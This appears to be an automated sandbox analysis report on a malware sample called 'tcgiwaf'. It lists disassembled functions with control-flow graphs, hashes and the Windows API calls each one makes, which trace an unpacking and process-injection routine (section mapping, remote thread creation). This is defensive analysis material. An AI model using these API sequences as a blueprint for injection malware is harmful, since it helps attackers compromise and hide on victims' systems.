                                              • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24
                                              Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 173 4015bc-4015c5 174 4015d0-4015de 173->174 175 4015ca call 401207 173->175 176 4015e0 174->176 177 4015e3-4015e8 174->177 175->174 176->177 179 401909-401911 177->179 180 4015ee-4015ff 177->180 179->177 183 401916-401956 call 401207 179->183 184 401605-40162e 180->184 185 401907 180->185 184->185 192 401634-40164b NtDuplicateObject 184->192 185->183 192->185 194 401651-401675 NtCreateSection 192->194 196 4016d1-4016f7 NtCreateSection 194->196 197 401677-401698 NtMapViewOfSection 194->197 196->185 201 4016fd-401701 196->201 197->196 199 40169a-4016b6 NtMapViewOfSection 197->199 199->196 202 4016b8-4016ce 199->202 201->185 204 401707-401728 NtMapViewOfSection 201->204 202->196 204->185 206 40172e-40174a NtMapViewOfSection 204->206 206->185 209 401750 206->209 209->185 210 401750 call 401755 209->210 210->185
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                              • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                              • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                              • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20
                                              Function 00403054 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 211 403054-403078 212 403197-40319c 211->212 213 40307e-403096 211->213 213->212 214 40309c-4030ad 213->214 215 4030af-4030b8 214->215 216 4030bd-4030cb 215->216 216->216 217 4030cd-4030d4 216->217 218 4030f6-4030fd 217->218 219 4030d6-4030f5 217->219 220 40311f-403122 218->220 221 4030ff-40311e 218->221 219->218 222 403124-403127 220->222 223 40312b 220->223 221->220 222->223 224 403129 222->224 223->215 225 40312d-403132 223->225 224->225 225->212 226 403134-403137 225->226 226->212 227 403139-403194 RtlCreateUserThread NtTerminateProcess 226->227 227->212
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                              • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                              • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                              • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5
                                              Function 0056003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 56003c-560047 1 56004c-560263 call 560a3f call 560e0f call 560d90 VirtualAlloc 0->1 2 560049 0->2 17 560265-560289 call 560a69 1->17 18 56028b-560292 1->18 2->1 23 5602ce-5603c2 VirtualProtect call 560cce call 560ce7 17->23 20 5602a1-5602b0 18->20 22 5602b2-5602cc 20->22 20->23 22->20 29 5603d1-5603e0 23->29 30 5603e2-560437 call 560ce7 29->30 31 560439-5604b8 VirtualFree 29->31 30->29 32 5605f4-5605fe 31->32 33 5604be-5604cd 31->33 36 560604-56060d 32->36 37 56077f-560789 32->37 35 5604d3-5604dd 33->35 35->32 40 5604e3-560505 35->40 36->37 43 560613-560637 36->43 41 5607a6-5607b0 37->41 42 56078b-5607a3 37->42 51 560517-560520 40->51 52 560507-560515 40->52 44 5607b6-5607cb 41->44 45 56086e-5608be LoadLibraryA 41->45 42->41 46 56063e-560648 43->46 48 5607d2-5607d5 44->48 50 5608c7-5608f9 45->50 46->37 49 56064e-56065a 46->49 53 5607d7-5607e0 48->53 54 560824-560833 48->54 49->37 55 560660-56066a 49->55 56 560902-56091d 50->56 57 5608fb-560901 50->57 58 560526-560547 51->58 52->58 59 5607e4-560822 53->59 60 5607e2 53->60 62 560839-56083c 54->62 61 56067a-560689 55->61 57->56 63 56054d-560550 58->63 59->48 60->54 64 560750-56077a 61->64 65 56068f-5606b2 61->65 62->45 66 56083e-560847 62->66 68 560556-56056b 63->68 69 5605e0-5605ef 63->69 64->46 70 5606b4-5606ed 65->70 71 5606ef-5606fc 65->71 72 56084b-56086c 66->72 73 560849 66->73 76 56056f-56057a 68->76 77 56056d 68->77 69->35 70->71 74 5606fe-560748 71->74 75 56074b 71->75 72->62 73->45 74->75 75->61 80 56057c-560599 76->80 81 56059b-5605bb 76->81 77->69 84 5605bd-5605db 80->84 81->84 84->63
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0056024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_560000_tcgiwaf.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 27a86b14edabf9ade6a7e6052f94aea87cf6fba087f3c177ac7a62f14760164d
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: B2526874A01229DFDB64CF58C985BA9BBB1BF09304F1480D9E94DAB391DB30AE85DF14
                                              Function 00621C87 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 228 621c87-621ca0 229 621ca2-621ca4 228->229 230 621ca6 229->230 231 621cab-621cb7 CreateToolhelp32Snapshot 229->231 230->231 232 621cc7-621cd4 Module32First 231->232 233 621cb9-621cbf 231->233 234 621cd6-621cd7 call 621946 232->234 235 621cdd-621ce5 232->235 233->232 240 621cc1-621cc5 233->240 238 621cdc 234->238 238->235 240->229 240->232
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00621CAF
                                              • Module32First.KERNEL32(00000000,00000224), ref: 00621CCF
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_610000_tcgiwaf.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: d96ec0932599499d2cbc8fdc8004e6e2413fe1abac97745c8f8bea4e814fe3f5
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: 27F0F635640B206FD7203BF5BC8CBAE72EDEF5A320F100528E642952C0CB74EC454E61
                                              Function 00560E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 241 560e0f-560e24 SetErrorMode * 2 242 560e26 241->242 243 560e2b-560e2c 241->243 242->243
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,00560223,?,?), ref: 00560E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,00560223,?,?), ref: 00560E1E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_560000_tcgiwaf.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: a5b931f4ea7891f8ec39f80adb89aa55d3030c8fd74fa9dfc01ba301779e0f72
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 6CD0123154512877D7102A94DC09BCE7F1CDF05B62F008411FB0DD9080C771994046E5
                                              Function 00401919 Relevance: 1.3, APIs: 1, Instructions: 79sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 244 401919-40191a 245 401969-4019c5 call 401207 Sleep call 401482 244->245 246 40191d-401956 call 401207 244->246 267 4019d4-401a19 245->267 268 4019c7-4019cf call 401583 245->268 278 401a1c-401a25 call 401207 267->278 279 401a0f-401a15 267->279 268->267 279->278
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                              • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                              • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                              • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F
                                              Function 00401959 Relevance: 1.3, APIs: 1, Instructions: 66sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 282 401959-4019c5 call 401207 Sleep call 401482 296 4019d4-401a19 282->296 297 4019c7-4019cf call 401583 282->297 307 401a1c-401a25 call 401207 296->307 308 401a0f-401a15 296->308 297->296 308->307
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                              • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                              • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                              • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF
                                              Function 00401970 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 311 401970-4019c5 call 401207 Sleep call 401482 323 4019d4-401a19 311->323 324 4019c7-4019cf call 401583 311->324 334 401a1c-401a25 call 401207 323->334 335 401a0f-401a15 323->335 324->323 335->334
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                              • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                              • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                              • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B
                                              Function 00401977 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 338 401977-4019c5 call 401207 Sleep call 401482 347 4019d4-401a19 338->347 348 4019c7-4019cf call 401583 338->348 358 401a1c-401a25 call 401207 347->358 359 401a0f-401a15 347->359 348->347 359->358
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                              • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                              • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                              • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B
                                              Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 362 401987-4019c5 call 401207 Sleep call 401482 373 4019d4-401a19 362->373 374 4019c7-4019cf call 401583 362->374 384 401a1c-401a25 call 401207 373->384 385 401a0f-401a15 373->385 374->373 385->384
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                              • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
                                              • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                              • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B
                                              Function 0040198A Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 388 40198a-40199d 389 4019a8-4019c5 Sleep call 401482 388->389 390 4019a2 call 401207 388->390 393 4019d4-401a19 389->393 394 4019c7-4019cf call 401583 389->394 390->389 404 401a1c-401a25 call 401207 393->404 405 401a0f-401a15 393->405 394->393 405->404
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                              • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                              • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                              • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B
                                              Function 00621946 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 408 621946-621980 call 621c59 411 621982-6219b5 VirtualAlloc call 6219d3 408->411 412 6219ce 408->412 414 6219ba-6219cc 411->414 412->412 414->412
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00621997
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_610000_tcgiwaf.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: e1565e21fd27825004f81731d3f870609084d435c3a895367f9cc0970ded4a5e
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 42113C79A00208EFDB01DF98C985E99BFF5AF08351F158095F9489B362D371EA90DF80

                                              Non-executed Functions

                                              Function 00403690 Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 244memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetLastError.KERNEL32(00000000), ref: 004036C1
                                              • DefineDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004036E9
                                              • _realloc.LIBCMT ref: 004036F1
                                              • OpenJobObjectW.KERNEL32(00000000,00000000,foyagili), ref: 0040372F
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040373A
                                              • _strlen.LIBCMT ref: 00403752
                                              • _abort.LIBCMT ref: 0040377E
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 004037DA
                                              • GetTickCount.KERNEL32 ref: 004037F0
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00403837
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ExchangeInterlocked$AllocCountDefineDeviceErrorLastObjectOpenTickVirtual_abort_realloc_strlen
                                              • String ID: %s %f %c$Bq $foyagili$nodeteriyucanisi pivibuyasedigozudaruzezune rafuxinetisekipocovovavomikatan$rupajineligigepubofe$zoviticejawesawa${
                                              • API String ID: 1986831385-628290909
                                              • Opcode ID: 5f070e074a5e9741a15d25e6933d49c530d81da921c20e23a25216c3e6978ac5
                                              • Instruction ID: dbe9b3807635e8ccfe06713225267c25a69f231be5d888f18942a88b2e388c8e
                                              • Opcode Fuzzy Hash: 5f070e074a5e9741a15d25e6933d49c530d81da921c20e23a25216c3e6978ac5
                                              • Instruction Fuzzy Hash: B59135F19403509FD700AF64ED49F9A7BA8A744706F01453AF644772E2C7BCAA44CBAE
                                              Function 004032A0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 202timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00403347
                                              • GetCommMask.KERNEL32(00000000,00000000), ref: 0040338A
                                              • GetNumberFormatW.KERNEL32(00000000,00000000,panigalixamadigagorov sowojacekiludumidige polocemor,00000000,?,00000000), ref: 004033B7
                                              • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004033C2
                                              • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004033D5
                                              • GetComputerNameA.KERNEL32(?,?), ref: 004033E6
                                              • ClearCommError.KERNEL32(00000000,00000000,00000000), ref: 004033F2
                                              • InterlockedIncrement.KERNEL32(?), ref: 004033FC
                                              • EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00403404
                                              • GetTempFileNameA.KERNEL32(00000000,?,00000000,00000000), ref: 00403417
                                              • _memset.LIBCMT ref: 0040342C
                                              • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 0040343C
                                              • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00403451
                                              • GetVersionExW.KERNEL32(?), ref: 0040345E
                                              • CreateActCtxW.KERNEL32(?), ref: 0040346B
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00403477
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00403483
                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00403494
                                              • GetCurrencyFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004034A6
                                              • GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000), ref: 004034B9
                                              • InterlockedIncrement.KERNEL32(?), ref: 004034C3
                                              • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 004034DB
                                              • GlobalUnWire.KERNEL32(00000000), ref: 004034E3
                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403518
                                              Strings
                                              • , xrefs: 00403309
                                              • panigalixamadigagorov sowojacekiludumidige polocemor, xrefs: 004033AE
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Interlocked$CommName$CreateExchangeFileFormatIncrementInfoVersion$AttributesClearComputerConfigConsoleCurrencyDialogDriveEnumErrorFormatsGlobalInputLocaleLogicalMaskMountNumberPathPointReadSemaphoreShortStringsTempTimeVerifyVolumeWire_memset
                                              • String ID: $panigalixamadigagorov sowojacekiludumidige polocemor
                                              • API String ID: 2730911676-1733501012
                                              • Opcode ID: d23e2264d0ef8cecea8dfaee8da5a593530ee72d2ec632fc149d14f78439c9d7
                                              • Instruction ID: 5e0aa9075be5d75de1ab1b599fef44862665e49ad9bf97c726e7214364ea247a
                                              • Opcode Fuzzy Hash: d23e2264d0ef8cecea8dfaee8da5a593530ee72d2ec632fc149d14f78439c9d7
                                              • Instruction Fuzzy Hash: 2B811EB5D40218AFEB10CF94DD49BADBBB8BB48701F104165F605B72D0D7B46A44CF59
                                              Function 00403560 Relevance: 18.1, APIs: 12, Instructions: 98timeprocesspipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004035BF
                                              • CreateJobObjectA.KERNEL32(00000000,00000000), ref: 004035C5
                                              • GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 004035D0
                                              • CreateNamedPipeW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004035E6
                                              • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 004035F0
                                              • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040360A
                                              • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040361C
                                              • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00403624
                                              • TlsGetValue.KERNEL32(00000000), ref: 0040362C
                                              • SetEnvironmentVariableW.KERNEL32(00000000,?), ref: 0040363B
                                              • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040364D
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0040365A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmpDownload File
